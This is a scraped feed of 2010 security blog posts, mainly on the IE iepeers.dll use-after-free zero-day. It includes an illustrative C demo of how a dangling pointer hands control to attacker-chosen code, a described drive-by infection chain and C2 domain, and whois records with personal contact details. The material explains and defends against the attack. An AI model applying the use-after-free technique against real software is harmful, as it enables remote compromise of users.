<h3>SecurityFocus</h3>

<div id="attachment_3759" class="wp-caption alignleft" style="width: 290px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/securityfocus.com_.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/securityfocus.com_.jpg" alt="The SecurityFocus web site before the shift." title="securityfocus.com" width="280" height="210" class="size-full wp-image-3759" /></a><p class="wp-caption-text">The SecurityFocus web site before the shift.</p></div>

<p>SecurityFocus.com kicked off as an online computer security news source in 1999, founded by a group including Arthur Wong, Al Huger and Elias Levy. In the summer of 1999 the Bugtraq mail list was subsumed into SecurityFocus. In 2002 the site was acquired by Symantec, the well-known anti-virus vendor, for <a href="http://www.symantec.com/press/2002/n020717.html">around $75 million</a> in cash.</p>

<h3>Bugtraq</h3>

<p>Bugtraq itself kicked off on November 5th, 1993, when Scott Chasin (Doc Holiday) started it in response to what he saw as CERT&#8217;s failure to publish security warnings properly. Its founding policy was to publish vulnerabilities without regard to vendor response, an early salvo in the ongoing industry fight over full disclosure, that is, disclosing all known details of a security flaw.</p>

<p>The list was initially unmoderated, but by the middle of 1995 it was switched to moderated to cut down on the noise. From 1996 to 2001 the list was moderated by Elias Levy (Aleph One), then turned over to David Ahmad, and, as far as we know, it now <a href="http://www.securityfocus.com/archive/1/425940/30/1860/threaded">rests in the hands</a> of David McKinney, a threat analyst at Symantec. The list was first hosted at Crimelab.com and moved to the NetSpace Project at Brown University when moderation began. In the summer of 1999 the list became part of SecurityFocus, and so when SecurityFocus was acquired by Symantec in 2002 the list was part of that deal.</p>

<p>The philosophical underpinnings of full disclosure are complex and <a href="http://www.wildernesscoast.org/bib/disclosure-by-date.html">long debated</a>, but the main argument for it is that once a vulnerability is widely known, the vendor responsible for the code fixes it faster. A secondary argument is that the full details let an attentive security practitioner put some form of mitigation in place for a complex issue before a patch exists. The argument against is, of course, that releasing the information lets a larger audience of attackers exploit the vulnerability.</p>

<p>Elias Levy (Aleph One) from Venezuela, well known as the author of the seminal article <i><a href="http://www.phrack.org/issues.html?issue=49&amp;id=14#article">Smashing the Stack for Fun and Profit</a></i> in Phrack, moderated the list from 1996 to 2001. In his words: <i>&#8220;the environment at that time was such that vendors weren&#8217;t making any patches. So the focus was on how to fix software that companies weren&#8217;t fixing.&#8221;</i> Some might question the pace of progress over the past ten years; we do have Patch Tuesday and all that entails, and the environment has shifted in a somewhat positive way, but timely patching of security problems is still a front-burner concern in information security.</p>

<p>Interestingly, when Symantec acquired SecurityFocus, and with it Bugtraq, there were accusations that Levy had &#8216;sold out&#8217; the original principles of the list. Partially in response, the <a href="http://lists.grok.org.uk/pipermail/full-disclosure/">Full-Disclosure mail list</a> was born.</p>

<h3>Finally</h3>

<p>SecurityFocus certainly lost whatever unbiased independence it had back in 2002; however, that move (the Symantec buyout) may also be what allowed it to keep going until now. The articles on the site were unusually complete (long for a security news site), making it possible to explain an idea fully, and some were written by technically capable authors who could provide good commentary and insight into the issues they were presenting. The loss of this information, from the perspective of the security industry&#8217;s history, is unfortunate, because if there is an industry that does not always effectively carry forward and build upon lessons learned, it is this one.</p>

<p>Or, as Santayana is usually paraphrased: &#8220;Those who do not learn from history are doomed to repeat it.&#8221;</p>

<p>Further, not many sources have picked up the security news mantle effectively. Churnalism sites that offer a morsel of new information wrapped in an awkward product pitch presented as news aren&#8217;t going to cut it. Corporate blogs are heavily censored, as their raison d&#8217;être is marketing. And many independent blogs value brevity, a positive at times but not when it doesn&#8217;t allow an idea to be fully fleshed out.</p>

<p>So we&#8217;re left with the thought that someone, somewhere, needs to fire up the next SecurityFocus.</p>

<h3>References</h3>

<ul>
<li><a href="http://en.wikipedia.org/wiki/Bugtraq">Wikipedia: Bugtraq</a></li>
<li><a href="http://www.securityfocus.com/archive">Mailing Lists &#8211; Security Focus</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/06/asian-men-prefer-ligatt/">Asian Men Prefer LIGATT</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/nationalcybersecurity-com-has-all-original-content/">NationalCyberSecurity.com has all &#8220;Original Content&#8221;</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/4305/">LIGATT&#8217;s Evans Strikes Back</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/06/did-ligatt-securitys-ceo-threaten-the-life-of-a-security-professional/">Did LIGATT Security&#8217;s CEO Threaten the Life of a Security Professional?</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/03/a-loss-of-securityfocus/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
		<item>
		<title>IEPeers &#8211; A New Internet Explorer Zero Day Vulnerability</title>
		<link>http://praetorianprefect.com/archives/2010/03/iepeers-a-new-internet-explorer-zero-day-vulnerability/</link>
		<comments>http://praetorianprefect.com/archives/2010/03/iepeers-a-new-internet-explorer-zero-day-vulnerability/#comments</comments>
		<pubDate>Wed, 10 Mar 2010 23:01:30 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Remote Exploit]]></category>
		<category><![CDATA[aurora]]></category>
		<category><![CDATA[drive by download]]></category>
		<category><![CDATA[Internet Explorer]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Vulnerability]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3511</guid>
		<description><![CDATA[We posted an aside yesterday referencing <a href="http://blogs.technet.com/msrc/archive/2010/03/09/security-advisory-981374-released.aspx">Microsoft's recent blog post</a> for <a href="http://www.microsoft.com/technet/security/advisory/981374.mspx">new security advisory 981374</a> referencing a new zero day vulnerability in Internet Explorer versions 6 and 7. New details have emerged since, and the exploit has moved from being what was described as part of "limited targeted attacks" to being widely accessible and <a href="http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb">available as a new module for the Metasploit framework</a>.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/ie_burning.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/ie_burning-150x150.jpg" alt="ie_burning" title="ie_burning" width="150" height="150" class="alignleft size-thumbnail wp-image-3526" /></a></p>

<p>We posted an aside yesterday citing <a href="http://blogs.technet.com/msrc/archive/2010/03/09/security-advisory-981374-released.aspx">Microsoft&#8217;s recent blog post</a> for <a href="http://www.microsoft.com/technet/security/advisory/981374.mspx">new security advisory 981374</a>, which describes a new zero-day vulnerability in Internet Explorer versions 6 and 7. New details have emerged since, and the exploit has moved from being part of what was described as &#8220;limited targeted attacks&#8221; to being widely accessible and <a href="http://www.rec-sec.com/exploits/msf/ie_iepeers_pointer.rb">available as a new module for the Metasploit framework</a>.</p>

<p>The major concern, as always with vulnerabilities like this one, is that a user needs only to visit a web site hosting the exploit to have their computer infected: there is no visible download and no other user interaction required.</p>

<p>The vulnerability is a use-after-free (memory is deallocated but later accessed through a stale pointer, causing unexpected results such as a crash or arbitrary code execution); here an invalid pointer reference is made to freed memory in the file iepeers.dll. What makes this class of bug exploitable rather than merely crashy is that the attacker can arrange for the freed memory to be handed back to an allocation whose contents they control (for example by spraying the heap from JavaScript), so the stale reference now points at data the attacker chose. This type of code error is fairly common, and this is the second major instance of it in Internet Explorer recently (the well-publicized <a href="http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/">&#8216;Google Aurora&#8217; attack</a> was associated with a similar type of defect in the popular browser).</p>
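<p>To make the bug class concrete, here is an added example of ours; it is not code from the original post, from Ben Abu&#8217;s Metasploit module, or from iepeers.dll (which is closed source and not shown anywhere on this page). A tiny deterministic two-slot allocator stands in for the browser heap, the names <code>peer_obj</code>, <code>legit_handler</code> and <code>attacker_handler</code> are invented, and the attacker&#8217;s &#8220;spray&#8221; is a plain same-size allocation rather than a JavaScript heap spray. It shows why the stale pointer matters: the freed slot is handed straight back to the attacker&#8217;s allocation, so the dangling call dispatches through attacker-controlled memory. The second function shows the simplest form of the fix, dropping the only reference when the object dies; the real fix in a browser is usually in its reference counting, but the principle is the same.</p>

```c
#include <stddef.h>
#include <stdio.h>

/*
 * A deterministic two-slot allocator standing in for the browser heap
 * (constructed for this example). Freed slots go on a LIFO free list, so
 * the next same-size allocation gets the slot that was just released,
 * which is exactly the behaviour a use-after-free exploit relies on.
 * Because the storage is a static array, nothing here is undefined
 * behaviour: the demo is repeatable, unlike a real dangling free().
 */
#define NSLOTS 2
#define SLOT_BYTES 32

static union { long double align; unsigned char bytes[SLOT_BYTES]; } slab[NSLOTS];
static int free_list[NSLOTS];
static int free_count;

static void heap_reset(void) {
    free_count = 0;
    for (int i = NSLOTS - 1; i >= 0; i--) free_list[free_count++] = i;  /* slot 0 ends up on top */
}

static void *heap_alloc(void) {
    return free_count ? (void *)slab[free_list[--free_count]].bytes : NULL;
}

static void heap_free(void *p) {
    size_t idx = (size_t)((unsigned char *)p - (unsigned char *)slab) / sizeof slab[0];
    free_list[free_count++] = (int)idx;   /* pushed on top: handed out again next */
}

/* The kind of object a browser frees: a function pointer (think vtable entry) plus data. */
typedef struct {
    int (*on_event)(void);
    int id;
} peer_obj;

static int legit_handler(void)    { return 1; }
static int attacker_handler(void) { return 0xbad; }  /* stands in for sprayed shellcode */

/* Vulnerable pattern: the object is freed, but a stale pointer to it is used afterwards. */
int demo_use_after_free(void) {
    heap_reset();
    peer_obj *obj = heap_alloc();
    obj->on_event = legit_handler;
    obj->id = 1;

    heap_free(obj);                  /* object released; 'obj' now dangles */

    /* The attacker allocates something the same size (from script, in a browser);
     * the allocator hands back the very slot 'obj' still points at. */
    peer_obj *spray = heap_alloc();
    spray->on_event = attacker_handler;
    spray->id = 2;

    return obj->on_event();          /* stale pointer dispatches to attacker-chosen code */
}

/* Fix: drop the reference when the object dies and refuse to use a cleared one. */
int demo_fixed(void) {
    heap_reset();
    peer_obj *obj = heap_alloc();
    obj->on_event = legit_handler;
    obj->id = 1;

    heap_free(obj);
    obj = NULL;                      /* the only remaining reference is cleared at free time */

    peer_obj *spray = heap_alloc();  /* attacker still gets the slot ... */
    spray->on_event = attacker_handler;
    spray->id = 2;

    if (obj == NULL) return -1;      /* ... but nothing dispatches through it any more */
    return obj->on_event();
}

int main(void) {
    printf("vulnerable: handler returned 0x%x\n", demo_use_after_free());
    printf("fixed:      result %d (use refused)\n", demo_fixed());
    return 0;
}
```

<p>DEP and Protected Mode, discussed below, attack the last step of this chain (executing or acting on what the dangling call reaches), not the dangling call itself, which is why they mitigate rather than fix the bug.</p>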

<p>In terms of impact, together these two versions of IE account for approximately 20% of the browser market. Microsoft has referenced Protected Mode, enabling Data Execution Prevention (DEP), and not browsing as a high-privilege (administrator) user as possible mitigations. While always a good idea, we&#8217;ve seen methods in the past that bypass both DEP and Protected Mode. As for user privileges, it&#8217;s never a good idea to browse the Internet as a high-privilege user, but an attacker who has gained access as a low-privilege user can still employ a privilege escalation vulnerability once on the computer. The net of this is that the most effective mitigation available, if you are very concerned, is to temporarily use a different browser, and that Microsoft needs to make a patch available in a timely manner.</p>

<h3>The Exploit</h3>

<p>As <a href="http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/">provided by Trancer</a> (Moshe Ben Abu), with modifications to the original that deobfuscate portions of the code and remove the malware payload:</p>

<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/03/ie_peers.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/03/ie_peers.jpg" alt="ie_peers" title="ie_peers" width="751" height="518" class="alignnone size-full wp-image-3598" /></a>
<br /></p>

<h3>The Attack</h3>

<p>The specific attack noticed on a web site (now down) called Topix21century.com occurs as follows:</p>

<ul>
<li>A user visits the web site, and a file called notes.exe or svohost.exe is downloaded and executed without the user&#8217;s knowledge (drive-by download).</li>
<li>This executable creates two copies of itself in the temp directory and drops a .dll file, which is then injected into the Internet Explorer process, giving the attacker back-door remote access to the computer.</li>
<li>Once in, the attacker can perform actions as the logged-on user, including attempting to escalate privileges, downloading files, etc.</li>
<li>McAfee noted the infected system attempting to open an SSL connection to the domain notes.topix21century.com.</li>
</ul>

<h3>Topix21century.com</h3>

<p>The only references to this topix21century.com site we noted are links in Japanese language forums referencing pictures of women in the Japanese Self-Defense Force.</p>

<p>The site is hosted at GoDaddy; a geolocation lookup on its IP (68.178.232.100) shows Scottsdale, Arizona, which tells you where GoDaddy is headquartered rather than where the site&#8217;s operator is.</p>

<p>The whois for the site hosting the exploit is as follows:</p>

<pre><code>Registrant:
   jack lee
   13block
   LA, California 55462
   United States

   Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
   Domain Name: TOPIX21CENTURY.COM
      Created on: 06-Mar-10
      Expires on: 06-Mar-11
      Last Updated on: 06-Mar-10

   Administrative Contact:
      lee, jack  robertwanger@aol.com
      13block
      LA, California 55462
      United States
      (818) 581-6872      Fax -- 

   Technical Contact:
      lee, jack  robertwanger@aol.com
      13block
      LA, California 55462
      United States
      (818) 581-6872      Fax -- 

   Domain servers in listed order:
      NS17.DOMAINCONTROL.COM
      NS18.DOMAINCONTROL.COM
</code></pre>

<p>A whois record with the same pattern (a registrant surnamed &#8216;lee&#8217;, an address of the form &#8216;Nblock&#8217; in LA, and a &#8216;robert wanger&#8217; contact mailbox) is listed for the domain hotgreenlight.com, currently parked:</p>

<pre><code>Registrant:
   thomason lee
   12block
   LA, California 95512
   United States

   Registered through: GoDaddy.com, Inc. (http://www.godaddy.com)
   Domain Name: HOTGREENLIGHT.COM
      Created on: 18-Dec-09
      Expires on: 18-Dec-10
      Last Updated on: 18-Dec-09

   Administrative Contact:
      lee, thomason  robert.wanger@hotmail.com
      12block
      LA, California 95512
      United States
      (626) 395-6544      Fax -- 

   Technical Contact:
      lee, thomason  robert.wanger@hotmail.com
      12block
      LA, California 95512
      United States
      (626) 395-6544      Fax -- 

   Domain servers in listed order:
      NS61.DOMAINCONTROL.COM
      NS62.DOMAINCONTROL.COM
</code></pre>

<h3>McAfee and Blame? (Update 03/11)</h3>

<p>For some silly reason, McAfee Labs is taking some blame for being transparent and informative in its Avert Labs post on Tuesday. When Israeli security researcher Moshe Ben Abu (a legitimate security researcher, not some shadowy underworld black hat) noticed the post had a URL reference to Topix21century.com, he went and had a look at the site, analyzed how the exploit worked, and contributed a module to the Metasploit project detailing how it functions.</p>

<p>Or put another way, he analyzed <b>an existing exploit already being used by attackers</b> and took the time to explain it. He didn&#8217;t invent it, use it to compromise computers, or engage in any other black hat activity. Some will argue that he amplified its effect, something that would take an entire blog post to dispute, so we won&#8217;t get into it here.</p>

<p>Ryan Naraine lays out this sequence, but passes no judgment on it, in an article on <a href="http://blogs.zdnet.com/security/?p=5666">ZDNet</a>. Unfortunately Elinor Mills at sister site CNET <a href="http://news.cnet.com/8301-27080_3-10467673-245.html">takes it a step further</a>, suggesting by inference (by asking McAfee to &#8220;respond&#8221;) that the anti-virus company bears some culpability here, to which McAfee responded:</p>

<p><i>&#8220;McAfee Labs does not support the release of exploit code, particularly in advance of a security patch being made available. We regularly sanitize blog content to prevent providing information that might assist attackers, while at the same time providing a service to customers and the security community to help improve protection levels,&#8221; the spokesman said in a statement via e-mail. &#8220;The post in question did not contain enough information to directly lead anyone to exploit code. However, we regret that in this unique situation the post did contain details that may have given exploit writers a starting point to hunt for exploit code. Future blog posts will be subject to additional sanitization.&#8221;</i></p>

<p>Such &#8220;sanitization&#8221;, a great Orwellian word, means that blog posts will be slower to publish (going through further &#8216;review&#8217; cycles) and will paint a less complete picture of what happened. Interestingly, since McAfee does not have the Amazing Kreskin on staff, it gets its information like everyone else: customers or related parties share it (presumably in un-sanitized form).</p>

<p>For anyone who hangs around black/gray hat discussion forums: you don&#8217;t see Plato&#8217;s dialogues going on in there, but you do notice that the yin side of the information security paradigm is pretty good at disseminating vulnerability information once it is discovered.</p>

<p>Worse yet, the response is contradictory, stating on one hand that the information in the post was appropriate and did not assist &#8220;attackers&#8221; (Ben Abu is still not an attacker, so presumably they mean groups working off the Metasploit module), but then reversing itself to say they regret the post and will &#8216;sanitize&#8217; more in the future.</p>

<p>The problem is that the analysis of the exploit had a lot more to do with Ben Abu&#8217;s analytical talent than with the somewhat refreshing transparency that has marked McAfee&#8217;s blogs since the Google Aurora incident. Unfortunately, judging by the response above, this period of valuable content may be at an end, censored by corporate review.</p>

<p>Further, as Ben Abu himself points out, he would have found the exploit code regardless of any McAfee post.</p>

<h3>Finally</h3>

<p>The timing of this could be better for Microsoft, in that it closely follows the Aurora incident with Google, which played out so publicly, and the defect is a nearly identical type of problem. That said, the saving grace for Microsoft in the retail market is that IE 8 is stated not to be affected, and Redmond would prefer you upgrade to the latest and greatest anyway.</p>

<p>The anti-virus vendors largely have the original payload figured out, but a payload can be swapped out at will; it is the infection vector that matters, and for that to be corrected Microsoft will have to issue a patch. In the meantime you have the option of temporarily using another browser, or of upgrading to IE 8, which is currently reported not to be affected.</p>

<p>This advice is reasonable for the home user; however, upgrading the browser across a large corporate network is no small thing. For that reason we advise waiting for the patch and applying it on a shortened cycle, since remote browser exploits that require no user interaction are critical problems. As always, users should avoid links to sites they&#8217;re not familiar with, but in practice this is very difficult, as almost everyone is susceptible to some effective social engineering trick (a targeted phishing e-mail, an IM seemingly from a friend, and so forth).</p>

<p>Regarding the tempest in a teapot around the McAfee Avert Labs blog post by Craig Schmugar, and the tired drumbeat of worn-out points about responsible disclosure in response to it, it&#8217;s time for some in the security industry to grow up a little. Transparency and the near-free flow of shared information are the only way the defensive side of information security can hope to catch up with the attackers.</p>

<h3>References</h3>

<ul>
<li><a href="http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-0806">CVE-2010-0806</a></li>
<li><a href="http://osvdb.org/show/osvdb/62810">OSVDB 62810</a></li>
<li><a href="http://www.microsoft.com/technet/security/advisory/981374.mspx">MSFT Security Advisory 981374</a></li>
<li><a href="http://www.avertlabs.com/research/blog/index.php/2010/03/09/targeted-internet-explorer-0day-attack-announced-cve-2010-0806/">Targeted Internet Explorer Zero-Day &#8211; McAfee Labs</a></li>
<li><a href="http://www.rec-sec.com/2010/03/10/internet-explorer-iepeers-use-after-free-exploit/">Microsoft Internet Explorer iepeers.dll use-after-free exploit</a></li>
</ul>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/">The &#8220;Aurora&#8221; IE Exploit Used Against Google in Action</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/windows-smb-crash-video/">Windows 7 SMB Kernel Crash Video</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/juniper-kernel-crash-scapy-code/">Juniper Kernel Crash &#8211; scapy Code</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/01/junos-juniper-kernel-crash-video/">JUNOS (Juniper) Kernel Crash Video</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/03/iepeers-a-new-internet-explorer-zero-day-vulnerability/feed/</wfw:commentRss>
		<slash:comments>8</slash:comments>
		</item>
		<item>
		<title>Microsoft&#8217;s Google Attack Patch?</title>
		<link>http://praetorianprefect.com/archives/2010/02/microsofts-google-attack-patch/</link>
		<comments>http://praetorianprefect.com/archives/2010/02/microsofts-google-attack-patch/#comments</comments>
		<pubDate>Fri, 26 Feb 2010 04:18:26 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Vulnerability]]></category>
		<category><![CDATA[funny]]></category>
		<category><![CDATA[Microsoft]]></category>
		<category><![CDATA[Patch Management]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3421</guid>
		<description><![CDATA[Noted journalist and friend of the blog <a href="http://twitter.com/georgevhulme">George V. Hulme</a> shared the picture below from CNBC, perhaps the most amusing way seen thus far of describing the patch for the '<a href="http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/">Aurora bug</a>' that famously affected Google late last year.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/fry_2.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/fry_2-150x150.jpg" alt="fry_2" title="fry_2" width="150" height="150" class="alignleft size-thumbnail wp-image-3422" /></a></p>

<p>Noted journalist and friend of the blog <a href="http://twitter.com/georgevhulme">George V. Hulme</a> shared the picture below from a CNBC broadcast, perhaps the most amusing way seen thus far of describing the patch for the &#8216;<a href="http://praetorianprefect.com/archives/2010/01/the-aurora-ie-exploit-in-action/">Aurora bug</a>&#8216; that famously affected Google late last year.</p>

<p>That assumes of course that Microsoft is not in fact working on a Google Attack Patch.</p>

<div id="attachment_3423" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/cnbc.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/cnbc.jpg" alt="The Google Attack Patch is coming soon." title="cnbc" width="750" height="566" class="size-full wp-image-3423" /></a><p class="wp-caption-text">The Google Attack Patch is coming soon.</p></div>

<p>Of course they are referring to <a href="http://blogs.technet.com/msrc/archive/2010/01/21/bulletin-ms10-002-released.aspx">Microsoft&#8217;s out-of-band patch</a> (MS10-002), released on January 21st for the Internet Explorer use-after-free vulnerability nicknamed Aurora.</p>

<div id="attachment_3427" class="wp-caption alignnone" style="width: 535px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/aurora_patch.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/aurora_patch.jpg" alt="Aurora Patch description." title="aurora_patch" width="525" height="160" class="size-full wp-image-3427" /></a><p class="wp-caption-text">Aurora Patch description.</p></div>

<p>Praetorian advises giving this patch special attention in your environment, especially if you still run Internet Explorer 6.0. The vulnerability is not confined to that version of the browser, but the method of attack against that version is well known and publicly circulating at this point.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2010/07/turning-an-atm-into-a-slot-machine/">Turning an ATM into a Slot Machine</a></li>
<li><a href="http://praetorianprefect.com/archives/2010/03/press-f1-for-help-pwned/">Press F1 for Help, pwned.</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/adobe-util-printd-zero-day/">Adobe util.printd Zero Day</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/12/six-bulletins-in-last-patch-tuesday-of-2009/">Six Bulletins in Last Patch Tuesday of 2009</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/the-barack-obama-donations-site-was-hacked%e2%80%a6err-no-it-wasn%e2%80%99t/">The Barack Obama Donations Site was Hacked…err, no it wasn’t.</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/02/microsofts-google-attack-patch/feed/</wfw:commentRss>
		<slash:comments>1</slash:comments>
		</item>
		<item>
		<title>A Brief Reminder, Passwords Have Been Around Forever</title>
		<link>http://praetorianprefect.com/archives/2010/02/a-brief-reminder-passwords-have-been-around-forever/</link>
		<comments>http://praetorianprefect.com/archives/2010/02/a-brief-reminder-passwords-have-been-around-forever/#comments</comments>
		<pubDate>Thu, 25 Feb 2010 04:25:21 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[Uncategorized]]></category>
		<category><![CDATA[funny]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3395</guid>
		<description><![CDATA[The much maligned password has existed for thousands of years, for example the Greek historian Polybius described their use in the Roman military before the birth of Christ.

To illustrate the point here is a clip, the password scene, from the 1932 Marx Brothers movie "Horse Feathers".]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/groucho.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/groucho-150x150.jpg" alt="groucho" title="groucho" width="150" height="150" class="alignleft size-thumbnail wp-image-3400" /></a></p>

<p>The much maligned password has existed for thousands of years, for example the Greek historian Polybius described their use in the Roman military before the birth of Christ.</p>

<p>To illustrate the point, here is a clip, the password scene, from the 1932 Marx Brothers movie &#8220;Horse Feathers&#8221;.</p>

<p><object width="425" height="344"><param name="movie" value="http://www.youtube.com/v/9IrCgCKrv8U&#038;hl=en_US&#038;fs=1&#038;"></param><param name="allowFullScreen" value="true"></param><param name="allowscriptaccess" value="always"></param><embed src="http://www.youtube.com/v/9IrCgCKrv8U&#038;hl=en_US&#038;fs=1&#038;" type="application/x-shockwave-flash" allowscriptaccess="always" allowfullscreen="true" width="425" height="344"></embed></object></p>

<p>At first he thought the password was &#8216;password&#8217;, putting him right in line with what is typically quoted as the second most frequently used password in computer systems.</p>

<p>Swordfish doesn&#8217;t appear in the top 500 worst passwords. Also a plus, they change the password often.</p>

<p>Remember, the password is &#8216;Swordfish&#8217;.</p>

<p><strong>Related Posts:</strong></p>
<ul>
<li><a href="http://praetorianprefect.com/archives/2009/12/googles-new-years-eve-tricks/">Google&#8217;s New Year&#8217;s Eve Tricks</a></li>
<li><a href="http://praetorianprefect.com/archives/2009/10/halloween-jokes-twitter-google/">Halloween Jokes, Twitter &#038; Google</a></li>
</ul><br />
]]></content:encoded>
			<wfw:commentRss>http://praetorianprefect.com/archives/2010/02/a-brief-reminder-passwords-have-been-around-forever/feed/</wfw:commentRss>
		<slash:comments>0</slash:comments>
		</item>
		<item>
		<title>Was the Austin Plane Crash Domestic Terrorism?</title>
		<link>http://praetorianprefect.com/archives/2010/02/was-the-austin-plane-crash-domestic-terrorism/</link>
		<comments>http://praetorianprefect.com/archives/2010/02/was-the-austin-plane-crash-domestic-terrorism/#comments</comments>
		<pubDate>Thu, 18 Feb 2010 19:24:27 +0000</pubDate>
		<dc:creator>Prefect</dc:creator>
				<category><![CDATA[homeland security]]></category>
		<category><![CDATA[Incident Response]]></category>
		<category><![CDATA[terrorism]]></category>

		<guid isPermaLink="false">http://praetorianprefect.com/?p=3346</guid>
		<description><![CDATA[In what could be the first act of domestic terrorism since Timothy McVeigh, a small plane (Piper) that set out from Georgetown Municipal Airport hit a federal office building housing the Internal Revenue Service (IRS) at 11:36 AM in Austin, Texas. A software developer, Joseph Andrew Stack, who had previously set his house on fire, was the pilot who suicidally flew his plane Kamikaze style into the building in an apparent act of revenge against the IRS as detailed in a 3,202 word suicide note on his web site: <a href="http://embeddedart.com">http://embeddedart.com</a>.]]></description>
			<content:encoded><![CDATA[<p><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/plane_crash_.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/plane_crash_-150x150.jpg" alt="plane_crash_" title="plane_crash_" width="150" height="150" class="alignleft size-thumbnail wp-image-3347" /></a></p>

<p>In what could be the first act of domestic terrorism since Timothy McVeigh, a small plane (a Piper) that set out from Georgetown Municipal Airport hit a federal office building housing the Internal Revenue Service (IRS) at 11:36 AM in Austin, Texas. A software developer, Joseph Andrew Stack, who had previously set his house on fire, was the pilot who suicidally flew his plane kamikaze-style into the building in an apparent act of revenge against the IRS, as detailed in a 3,202-word suicide note on his web site: http://embeddedart.com. The web site is reporting a last update of Thursday, February 18, 2010 10:12:53 AM.</p>

<p>Note that the following message now appears on embeddedart.com: <i>This website has been taken offline due to the sensitive nature of the events that transpired in Texas this morning and in compliance with a request from the FBI. If you want to see the original letter, please see the archived version at thesmokinggun.com. Regards, T35 Hosting <a href="http://www.t35.com/">http://www.t35.com/</a></i></p>

<p>The suicide note on embeddedart.com downloaded as a pdf:
<a href='http://praetorianprefect.com/wp-content/uploads/2010/02/Well-Mr.-Big-Brother-IRS-man...-take-my-pound-of-flesh-and-sleep-well..pdf'>Well Mr. Big Brother IRS man&#8230; take my pound of flesh and sleep well.</a></p>

<div id="attachment_3374" class="wp-caption alignnone" style="width: 760px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/suicide_note.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/suicide_note.jpg" alt="The suicide note as it originally appeared." title="suicide_note" width="750" height="501" class="size-full wp-image-3374" /></a><p class="wp-caption-text">The suicide note as it originally appeared.</p></div>
<br /></p>

<p>The FBI and CIA also have offices in the same building complex. This particular IRS office is home to a group called the EP Team Audit Program, which examines employee benefit plans with 2,500 or more participants.</p>

<h3>Terrorism?</h3>

<p><div id="attachment_3388" class="wp-caption alignleft" style="width: 310px"><a href="http://praetorianprefect.com/wp-content/uploads/2010/02/officebuilding.jpg"><img src="http://praetorianprefect.com/wp-content/uploads/2010/02/officebuilding-300x259.jpg" alt="The Echelon Building Burning." title="officebuilding" width="300" height="259" class="size-medium wp-image-3388" /></a><p class="wp-caption-text">The Echelon Building Burning.</p></div>

<p>Well, certainly not the kind that one would think of with regard to foreign, religiously or ideologically based groups such as Al Qaeda, but let&#8217;s take a closer look at what the definition of terrorism really is:</p>

<p><i>(the calculated use of violence (or the threat of violence) against civilians in order to attain goals that are political or religious or ideological in nature; this is done through intimidation or coercion or instilling fear)</i> -Princeton.edu</p>

<p>Well, one could make the argument that this was a decision to commit suicide in a very public way (crashing planes into buildings is certainly an attention getter) to further his views as outlined in the manifesto he wrote, or that this was an attempt to incite some sort of movement by his actions. Regardless, there was an attempt to incite fear. The deliberate use of an airplane as the method of attack, along with the parallels it invokes, is no accident. These characteristics make this, albeit a minor one given that no deaths were reported, an act of domestic terrorism.</p>

<blockquote>
  <p>“I am finally ready to stop this insanity.  Well, Mr. Big Brother IRS man, let&#8217;s try something different; take my pound of flesh and sleep well.” <br />- Joseph Stack</p>
</blockquote>

<h3>Is the Letter a Hoax?</h3>

